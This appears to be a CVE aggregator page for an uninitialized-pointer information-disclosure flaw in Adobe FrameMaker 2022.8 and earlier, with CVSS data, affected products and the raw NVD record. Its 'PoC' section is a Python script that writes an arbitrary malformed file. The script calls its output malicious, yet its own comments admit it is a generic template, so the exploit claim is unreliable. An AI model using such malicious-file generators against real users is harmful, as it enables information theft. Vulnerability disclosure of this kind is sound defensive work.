Security Vulnerability Report
CVE-2026-27300 CVSS 5.5 MEDIUM

CVE-2026-27300

Published: 2026-04-14 23:16:27
Last Modified: 2026-04-15 17:35:09

Description

Adobe Framemaker versions 2022.8 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe FrameMaker <= 2022.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

# Proof of Concept for CVE-2026-27300
# Description: Generates a malformed file to trigger the uninitialized pointer access.
# Note: This is a generic template as specific offsets require reverse engineering.


def generate_poc(filename):
    # Simulate a header that FrameMaker might parse
    header = b'\x00\x00\x00\x00MIF'

    # Payload construction to potentially trigger the uninitialized pointer path
    # The exact structure depends on the internal parsing logic of FrameMaker
    payload = header + b'A' * 0x200 + b'\x00' * 0x100

    try:
        with open(filename, 'wb') as f:
            f.write(payload)
        print(f"[+] Malicious file generated: {filename}")
        print("[+] Open this file in Adobe FrameMaker <= 2022.8 to test the vulnerability.")
    except Exception as e:
        print(f"[-] Error creating file: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python poc.py <output_filename>")
    else:
        generate_poc(sys.argv[1])

References

https://helpx.adobe.com/security/products/framemaker/apsb26-36.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27300", "sourceIdentifier": "[email protected]", "published": "2026-04-14T23:16:27.240", "lastModified": "2026-04-15T17:35:09.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Framemaker versions 2022.8 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-824"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2022.9", "matchCriteriaId": "6943B816-3A7D-47BF-9E01-DF86C9332C19"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/framemaker/apsb26-36.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}